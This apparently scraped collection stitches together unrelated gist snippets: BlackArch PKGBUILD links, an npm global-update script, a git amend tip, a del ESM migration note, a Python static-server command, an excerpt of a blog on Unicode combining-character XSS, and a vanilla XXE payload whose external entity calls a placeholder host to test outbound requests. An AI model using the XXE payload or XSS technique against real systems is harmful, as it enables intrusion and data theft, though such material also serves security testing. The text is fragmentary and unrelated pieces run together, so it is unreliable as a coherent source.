- BA: BlackArch
- AL: ArchLinux
- SO: StackOverflow
- AL PKGBUILD guide: https://wiki.archlinux.org/index.php/PKGBUILD
- BA PKGBUILD templates: https://github.com/BlackArch/blackarch-pkgbuilds
#!/bin/sh | |
set -e | |
set -x | |
for package in $(npm -g outdated --parseable --depth=0 | cut -d: -f3) | |
do | |
npm -g install "$package" | |
done |
How to get Pull Requests data using Github in the browser, or using the API to allow for automating reporting or building in values into a website.
Most application security practitioners are familiar with Unicode XSS, which typically arises from the Unicode character fullwidth-less-than-sign. It’s not a common vulnerability but does occasionally appear in applications that otherwise have good XSS protection. In this blog I describe another variant of Unicode XSS that I have identified, using combining characters. I’ve not observed this in the wild, so it’s primarily of theoretical concern. But the scenario is not entirely implausible and I’ve not otherwise seen this technique discussed, so I hope this is useful.
Lab: https://4t64ubva.xssy.uk/
A quick investigation of the lab shows that it is echoing the name parameter, and performing HTML escaping:
At some point you’ll find yourself in a situation where you need edit a commit message. That commit might already be pushed or not, be the most recent or burried below 10 other commits, but fear not, git has your back 🙂.
git commit --amend
This will open your $EDITOR
and let you change the message. Continue with your usual git push origin master
.
-------------------------------------------------------------- | |
Vanilla, used to verify outbound xxe or blind xxe | |
-------------------------------------------------------------- | |
<?xml version="1.0" ?> | |
<!DOCTYPE r [ | |
<!ELEMENT r ANY > | |
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
]> | |
<r>&sp;</r> |
del v7.0.0 moved to pure ESM (no dual support), which forced me to move my gulpfile to ESM to be able to continue to use del
.
The author sindresorhus maintains a lot of npm packages and does not want to provides an upgrade guide for each package so he provided a generic guide. But this guide is a bit vague because it's generic and not helping for gulp, hence this guide.
Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.
$ python -m SimpleHTTPServer 8000